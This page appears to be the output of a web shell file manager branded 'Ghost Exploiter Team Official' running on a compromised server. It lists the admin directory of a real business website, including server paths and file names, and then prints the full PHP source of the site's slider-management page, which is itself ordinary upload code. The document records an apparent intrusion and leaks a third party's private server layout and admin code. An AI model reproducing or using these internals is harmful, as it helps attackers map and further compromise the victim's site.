Ghost Exploiter Team Official
/
home
/
ramdevpcb
/
public_html
/
admin.ramdevpcb.com
/
Nama File / Folder
Size
Action
.well-known
--
NONE
Data_
--
NONE
assets
--
NONE
cgi-bin
--
NONE
include
--
NONE
uploads
--
NONE
.htaccess
0.274KB
Hapus
Edit
Rename
8Products.php
15.674KB
Hapus
Edit
Rename
Enquiry.php
8.806KB
Hapus
Edit
Rename
MonthlyProducts.php
15.686KB
Hapus
Edit
Rename
add-brand.php
27.782KB
Hapus
Edit
Rename
add-vendor.php
42.001KB
Hapus
Edit
Rename
b-bclients.php
12.086KB
Hapus
Edit
Rename
b-bclients1.php
9.329KB
Hapus
Edit
Rename
b-cclients.php
13.998KB
Hapus
Edit
Rename
category.php
13.583KB
Hapus
Edit
Rename
challan.php
15.391KB
Hapus
Edit
Rename
color.php
11.327KB
Hapus
Edit
Rename
company.php
14.712KB
Hapus
Edit
Rename
courier.php
16.539KB
Hapus
Edit
Rename
customerreport.php
11.684KB
Hapus
Edit
Rename
delete_product_pdf.php
0.618KB
Hapus
Edit
Rename
discount-b2b.php
9.862KB
Hapus
Edit
Rename
discount-b2c.php
8.333KB
Hapus
Edit
Rename
discount-list.php
10.272KB
Hapus
Edit
Rename
discount-server.php
1.206KB
Hapus
Edit
Rename
error_log
276.584KB
Hapus
Edit
Rename
generate-invoice-server.php
3.183KB
Hapus
Edit
Rename
generate-invoice.php
15.014KB
Hapus
Edit
Rename
index.php
0KB
Hapus
Edit
Rename
invoice-list.php
10.6KB
Hapus
Edit
Rename
invoice22222.php
31.864KB
Hapus
Edit
Rename
invoicenew1.php
17.683KB
Hapus
Edit
Rename
invoicereport.php
31.128KB
Hapus
Edit
Rename
login.php
0KB
Hapus
Edit
Rename
newstock.php
15.827KB
Hapus
Edit
Rename
offline-order-add.php
2.254KB
Hapus
Edit
Rename
offline-order-delete.php
0.338KB
Hapus
Edit
Rename
offline-order-server.php
1.695KB
Hapus
Edit
Rename
offline-order.php
30.544KB
Hapus
Edit
Rename
order-details.php
14.237KB
Hapus
Edit
Rename
order-item-details.php
7.875KB
Hapus
Edit
Rename
paidd.png
27.518KB
Hapus
Edit
Rename
product-list.php
8.904KB
Hapus
Edit
Rename
product.php
35.78KB
Hapus
Edit
Rename
productreport.php
28.885KB
Hapus
Edit
Rename
save_image_order.php
1.284KB
Hapus
Edit
Rename
slider.php
18.567KB
Hapus
Edit
Rename
sms.js
2.603KB
Hapus
Edit
Rename
stock.php
14.202KB
Hapus
Edit
Rename
stockreport.php
24.525KB
Hapus
Edit
Rename
subcategory.php
13.671KB
Hapus
Edit
Rename
update-order-status.php
2.562KB
Hapus
Edit
Rename
update-user-role.php
0.306KB
Hapus
Edit
Rename
vijayinvoice.php
17.683KB
Hapus
Edit
Rename
<?php // slider.php - Slider manager with sequence (move up/down) // DEBUG - you can enable while debugging, but keep commented on production // ini_set('display_errors', 1); // ini_set('display_startup_errors', 1); // error_reporting(E_ALL); // ======= DB include ======= require_once 'include/db.php'; // must create $conn (mysqli instance) if (!isset($conn) || !($conn instanceof mysqli)) { die("Database connection not found. Check include/db.php"); } // ======= Paths ======= $uploadDirWeb = 'assets/images/slider/'; // web path saved in DB $uploadDirFs = __DIR__ . '/' . $uploadDirWeb; // filesystem path // ensure folder exists if (!is_dir($uploadDirFs)) { if (!mkdir($uploadDirFs, 0755, true)) { die("Cannot create upload folder: $uploadDirFs. Check permissions."); } } // flash message (after redirect) $flash = ''; if (isset($_GET['msg'])) { $flash = htmlspecialchars($_GET['msg']); } // ======= Helper: redirect with message ======= function redirect_with_msg($msg) { $url = strtok($_SERVER["REQUEST_URI"], '?'); // remove query header('Location: ' . $url . '?msg=' . urlencode($msg)); exit; } // ======= Handle Upload ======= // The upload form should include: <input type="hidden" name="action" value="upload_slide"> if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action']) && $_POST['action'] === 'upload_slide') { // check file exists in POST if (!isset($_FILES['image'])) { redirect_with_msg('No file uploaded. Make sure file input name is "image" and form enctype="multipart/form-data".'); } $file = $_FILES['image']; // check common upload errors if ($file['error'] !== UPLOAD_ERR_OK) { $map = [ UPLOAD_ERR_INI_SIZE => 'The uploaded file exceeds server limit.', UPLOAD_ERR_FORM_SIZE => 'The uploaded file exceeds form limit.', UPLOAD_ERR_PARTIAL => 'File was only partially uploaded.', UPLOAD_ERR_NO_FILE => 'No file was uploaded.', UPLOAD_ERR_NO_TMP_DIR => 'Missing temporary folder on server.', UPLOAD_ERR_CANT_WRITE => 'Failed to write file to disk.', UPLOAD_ERR_EXTENSION => 'A PHP extension stopped the file upload.', ]; $msg = $map[$file['error']] ?? 'Unknown upload error.'; redirect_with_msg("Upload error: $msg"); } // validate image using getimagesize $imgInfo = @getimagesize($file['tmp_name']); if ($imgInfo === false) { redirect_with_msg('Invalid image file.'); } // mime + extension whitelist $allowedMime = ['image/jpeg','image/png','image/webp','image/gif']; $allowedExt = ['jpg','jpeg','png','webp','gif']; if (!in_array($imgInfo['mime'], $allowedMime, true)) { redirect_with_msg('Unsupported image type. Allowed: jpg, png, webp, gif.'); } $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION)); if (!in_array($ext, $allowedExt, true)) { redirect_with_msg('Unsupported file extension.'); } // size check (5MB) $maxBytes = 5 * 1024 * 1024; if ($file['size'] > $maxBytes) { redirect_with_msg('File too large. Max 5MB.'); } // create unique filename and move $newName = uniqid('slide_') . '.' . $ext; $destFs = $uploadDirFs . $newName; $destWeb = 'http://admin.ramdevpcb.com/'.$uploadDirWeb . $newName; // relative web path saved in DB if (!move_uploaded_file($file['tmp_name'], $destFs)) { redirect_with_msg('Failed to move uploaded file. Check folder permissions.'); } // set proper permissions for file @chmod($destFs, 0644); // compute next sequence (max + 1) $res = $conn->query("SELECT COALESCE(MAX(sequence), 0) + 1 AS next_seq FROM hero_slides"); if ($res) { $row = $res->fetch_assoc(); $nextSeq = (int)$row['next_seq']; } else { $nextSeq = 1; } // insert into DB $stmt = $conn->prepare("INSERT INTO hero_slides (image, sequence) VALUES (?, ?)"); if (!$stmt) { @unlink($destFs); // cleanup redirect_with_msg('Server error (DB prepare failed).'); } $stmt->bind_param('si', $destWeb, $nextSeq); if (!$stmt->execute()) { $err = $stmt->error; $stmt->close(); @unlink($destFs); redirect_with_msg('Server error (DB insert failed): ' . $err); } $stmt->close(); redirect_with_msg('Slide uploaded successfully.'); } // ======= Handle Delete ======= // The delete form should include: <input type="hidden" name="action" value="delete_slide"> if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action']) && $_POST['action'] === 'delete_slide') { $id = (int) ($_POST['id'] ?? 0); if ($id <= 0) { redirect_with_msg('Invalid slide id.'); } // fetch image path (use bind_result to avoid get_result dependency) $stmt = $conn->prepare("SELECT image FROM hero_slides WHERE id = ?"); if (!$stmt) redirect_with_msg('Server error (DB prepare failed).'); $stmt->bind_param('i', $id); if (!$stmt->execute()) { $stmt->close(); redirect_with_msg('Server error (DB query failed).'); } $stmt->bind_result($imagePath); $found = $stmt->fetch(); $stmt->close(); if (!$found || empty($imagePath)) { redirect_with_msg('Slide not found.'); } // ensure the file is inside uploadDirFs (safety) $fileFs = realpath(__DIR__ . '/' . $imagePath); $dirFs = realpath($uploadDirFs); if ($fileFs === false || $dirFs === false || strpos($fileFs, $dirFs) !== 0) { // file path not inside slider folder - don't unlink, but still delete DB record $safeUnlink = false; } else { $safeUnlink = file_exists($fileFs); } // delete DB record $del = $conn->prepare("DELETE FROM hero_slides WHERE id = ?"); if (!$del) redirect_with_msg('Server error (DB prepare failed).'); $del->bind_param('i', $id); if (!$del->execute()) { $err = $del->error; $del->close(); redirect_with_msg('Server error (DB delete failed): ' . $err); } $del->close(); // delete file if safe if ($safeUnlink) { @unlink($fileFs); } redirect_with_msg('Slide removed.'); } // ======= Handle Move (up/down) ======= // The move form should include: <input type="hidden" name="action" value="move_slide"> and fields id and dir(up/down) if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action']) && $_POST['action'] === 'move_slide') { $id = (int)($_POST['id'] ?? 0); $dir = ($_POST['dir'] ?? ''); if ($id <= 0 || ($dir !== 'up' && $dir !== 'down')) { redirect_with_msg('Invalid move parameters.'); } // get current sequence $stmt = $conn->prepare("SELECT sequence FROM hero_slides WHERE id = ?"); if (!$stmt) redirect_with_msg('Server error (DB prepare failed).'); $stmt->bind_param('i', $id); if (!$stmt->execute()) { $stmt->close(); redirect_with_msg('Server error (DB query failed).'); } $stmt->bind_result($seq); $found = $stmt->fetch(); $stmt->close(); if (!$found) redirect_with_msg('Slide not found.'); if ($dir === 'up') { // find previous (smaller sequence) $stmt = $conn->prepare("SELECT id, sequence FROM hero_slides WHERE sequence < ? ORDER BY sequence DESC LIMIT 1"); $stmt->bind_param('i', $seq); } else { // down: find next (greater sequence) $stmt = $conn->prepare("SELECT id, sequence FROM hero_slides WHERE sequence > ? ORDER BY sequence ASC LIMIT 1"); $stmt->bind_param('i', $seq); } if (!$stmt) redirect_with_msg('Server error (DB prepare failed).'); if (!$stmt->execute()) { $stmt->close(); redirect_with_msg('Server error (DB query failed).'); } $stmt->bind_result($otherId, $otherSeq); $foundOther = $stmt->fetch(); $stmt->close(); if (!$foundOther) { // already top/bottom - nothing to do redirect_with_msg('Already at the ' . ($dir === 'up' ? 'top' : 'bottom') . '.'); } // swap sequences inside transaction $conn->begin_transaction(); try { $u1 = $conn->prepare("UPDATE hero_slides SET sequence = ? WHERE id = ?"); if (!$u1) throw new Exception('DB prepare failed (u1)'); $u1->bind_param('ii', $otherSeq, $id); if (!$u1->execute()) throw new Exception('Update failed (u1): ' . $u1->error); $u1->close(); $u2 = $conn->prepare("UPDATE hero_slides SET sequence = ? WHERE id = ?"); if (!$u2) throw new Exception('DB prepare failed (u2)'); $u2->bind_param('ii', $seq, $otherId); if (!$u2->execute()) throw new Exception('Update failed (u2): ' . $u2->error); $u2->close(); $conn->commit(); redirect_with_msg('Slide moved ' . ($dir === 'up' ? 'up' : 'down') . '.'); } catch (Exception $e) { $conn->rollback(); redirect_with_msg('Move failed: ' . $e->getMessage()); } } ?> <!doctype html> <html lang="en" dir="ltr"> <head> <!-- META DATA --> <meta charset="UTF-8"> <meta name='viewport' content='width=device-width, initial-scale=1.0, user-scalable=0'> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="description" content="Ramdev PCB Admin"> <meta name="author" content="Ramdev PCB Admin"> <meta name="keywords" content="Ramdev PCB"> <!-- FAVICON --> <link rel="shortcut icon" type="image/x-icon" href="assets/images/brand/favicon.ico" /> <!-- TITLE --> <title>Slider Ramdev PCB </title> <!-- BOOTSTRAP CSS --> <link id="style" href="assets/plugins/bootstrap/css/bootstrap.min.css" rel="stylesheet" /> <!-- STYLE CSS --> <link href="assets/css/style.css" rel="stylesheet" /> <link href="assets/css/dark-style.css" rel="stylesheet" /> <link href="assets/css/transparent-style.css" rel="stylesheet"> <link href="assets/css/skin-modes.css" rel="stylesheet" /> <!--- FONT-ICONS CSS --> <link href="assets/css/icons.css" rel="stylesheet" /> <!-- COLOR SKIN CSS --> <link id="theme" rel="stylesheet" type="text/css" media="all" href="assets/colors/color1.css" /> </head> <body class="app sidebar-mini ltr light-mode"> <!-- PAGE --> <div class="page"> <div class="page-main"> <!-- app-Header --> <?php include('include/header.php');?> <!--APP-SIDEBAR--> <?php include('include/sidebarmenu.php');?> <!--app-content open--> <div class="main-content app-content mt-0"> <div class="side-app"> <!-- CONTAINER --> <div class="main-container container-fluid"> <!-- PAGE-HEADER --> <div class="page-header"> <h1 class="page-title">Slider</h1> <div> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="javascript:void(0)">Home</a></li> <li class="breadcrumb-item active" aria-current="page">Slider</li> </ol> </div> </div> <!-- PAGE-HEADER END --> <!-- Slider Management Card --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"><h3 class="card-title">Manage Slider Images</h3></div> <div class="card-body"> <?php if (!empty($flash)): ?> <div class="alert alert-info"><?= $flash ?></div> <?php endif; ?> <!-- Upload form --> <form method="post" enctype="multipart/form-data" class="mb-4"> <input type="hidden" name="action" value="upload_slide"> <div class="row"> <div class="col-md-6"> <input type="file" name="image" accept="image/*" required class="form-control" /> </div> <div class="col-md-2"> <button class="btn btn-primary" type="submit">Upload</button> </div> </div> <small class="form-text text-muted">Size: 1300px X 500px | Max 5MB | Allowed: jpg, png, webp, gif.</small> </form> <!-- Existing slides list --> <div class="row"> <?php $res = $conn->query("SELECT id, image, sequence FROM hero_slides ORDER BY sequence ASC, id ASC"); if ($res && $res->num_rows > 0) { while ($s = $res->fetch_assoc()) { $img = htmlspecialchars($s['image']); $id = (int)$s['id']; $seq = (int)$s['sequence']; ?> <div class="col-sm-3 mb-3"> <div class="card"> <img src="<?= $img ?>" class="card-img-top" style="height:150px; object-fit:cover;" alt="slide"> <div class="card-body p-2 text-center"> <div class="d-flex justify-content-between align-items-center"> <form method="post" onsubmit="return confirm('Delete this slide?');" style="display:inline;"> <input type="hidden" name="action" value="delete_slide"> <input type="hidden" name="id" value="<?= $id ?>"> <button type="submit" class="btn btn-sm btn-danger">Remove</button> </form> <div> <form method="post" style="display:inline;"> <input type="hidden" name="action" value="move_slide"> <input type="hidden" name="id" value="<?= $id ?>"> <input type="hidden" name="dir" value="up"> <button type="submit" class="btn btn-sm btn-secondary" <?= $seq === 1 ? 'disabled' : '' ?>>↑</button> </form> <form method="post" style="display:inline;"> <input type="hidden" name="action" value="move_slide"> <input type="hidden" name="id" value="<?= $id ?>"> <input type="hidden" name="dir" value="down"> <button type="submit" class="btn btn-sm btn-secondary">↓</button> </form> </div> </div> <div class="mt-2"> <small class="text-muted">Sequence: <?= $seq ?></small> </div> </div> </div> </div> <?php } } else { echo '<div class="col-12"><em>No slides uploaded yet.</em></div>'; } ?> </div> </div> </div> </div> </div> </div> <!-- CONTAINER END --> </div> </div> <!--app-content close--> </div> <!-- FOOTER --> <?php include('include/footer.php');?> <!-- FOOTER END --> </div> <!-- BACK-TO-TOP --> <a href="#top" id="back-to-top"><i class="fa fa-angle-up"></i></a> <!-- JQUERY JS --> <script src="assets/js/jquery.min.js"></script> <!-- BOOTSTRAP JS --> <script src="assets/plugins/bootstrap/js/popper.min.js"></script> <script src="assets/plugins/bootstrap/js/bootstrap.min.js"></script> <!-- SPARKLINE JS--> <script src="assets/js/jquery.sparkline.min.js"></script> <!-- Sticky js --> <script src="assets/js/sticky.js"></script> <!-- CHART-CIRCLE JS--> <script src="assets/js/circle-progress.min.js"></script> <!-- PIETY CHART JS--> <script src="assets/plugins/peitychart/jquery.peity.min.js"></script> <script src="assets/plugins/peitychart/peitychart.init.js"></script> <!-- SIDEBAR JS --> <script src="assets/plugins/sidebar/sidebar.js"></script> <!-- Perfect SCROLLBAR JS--> <script src="assets/plugins/p-scroll/perfect-scrollbar.js"></script> <script src="assets/plugins/p-scroll/pscroll.js"></script> <script src="assets/plugins/p-scroll/pscroll-1.js"></script> <!-- INTERNAL CHARTJS CHART JS--> <script src="assets/plugins/chart/Chart.bundle.js"></script> <script src="assets/plugins/chart/rounded-barchart.js"></script> <script src="assets/plugins/chart/utils.js"></script> <!-- INTERNAL SELECT2 JS --> <script src="assets/plugins/select2/select2.full.min.js"></script> <!-- INTERNAL Bootstrap-Datepicker js--> <script src="assets/plugins/bootstrap-datepicker/bootstrap-datepicker.js"></script> <!-- DATEPICKER JS --> <script src="assets/plugins/date-picker/date-picker.js"></script> <script src="assets/plugins/date-picker/jquery-ui.js"></script> <script src="assets/plugins/input-mask/jquery.maskedinput.js"></script> <!-- INTERNAL Data tables js--> <script src="assets/plugins/datatable/js/jquery.dataTables.min.js"></script> <script src="assets/plugins/datatable/js/dataTables.bootstrap5.js"></script> <script src="assets/plugins/datatable/js/dataTables.buttons.min.js"></script> <script src="assets/plugins/datatable/js/buttons.bootstrap5.min.js"></script> <script src="assets/plugins/datatable/js/jszip.min.js"></script> <script src="assets/plugins/datatable/pdfmake/pdfmake.min.js"></script> <script src="assets/plugins/datatable/pdfmake/vfs_fonts.js"></script> <script src="assets/plugins/datatable/js/buttons.html5.min.js"></script> <script src="assets/plugins/datatable/js/buttons.print.min.js"></script> <script src="assets/plugins/datatable/js/buttons.colVis.min.js"></script> <script src="assets/plugins/datatable/dataTables.responsive.min.js"></script> <script src="assets/plugins/datatable/responsive.bootstrap5.min.js"></script> <script src="assets/js/table-data.js"></script> <!-- INTERNAL APEXCHART JS --> <script src="assets/js/apexcharts.js"></script> <script src="assets/plugins/apexchart/irregular-data-series.js"></script> <!-- C3 CHART JS --> <script src="assets/plugins/charts-c3/d3.v5.min.js"></script> <script src="assets/plugins/charts-c3/c3-chart.js"></script> <!-- CHART-DONUT JS --> <script src="assets/js/charts.js"></script> <!-- INTERNAL Flot JS --> <script src="assets/plugins/flot/jquery.flot.js"></script> <script src="assets/plugins/flot/jquery.flot.fillbetween.js"></script> <script src="assets/plugins/flot/chart.flot.sampledata.js"></script> <script src="assets/plugins/flot/dashboard.sampledata.js"></script> <!-- INTERNAL Vector js --> <script src="assets/plugins/jvectormap/jquery-jvectormap-2.0.2.min.js"></script> <script src="assets/plugins/jvectormap/jquery-jvectormap-world-mill-en.js"></script> <!-- SIDE-MENU JS--> <script src="assets/plugins/sidemenu/sidemenu.js"></script> <!-- INTERNAL INDEX JS --> <script src="assets/js/index1.js"></script> <!-- Color Theme js --> <script src="assets/js/themeColors.js"></script> <!-- CUSTOM JS --> <script src="assets/js/custom.js"></script> </body> </html>
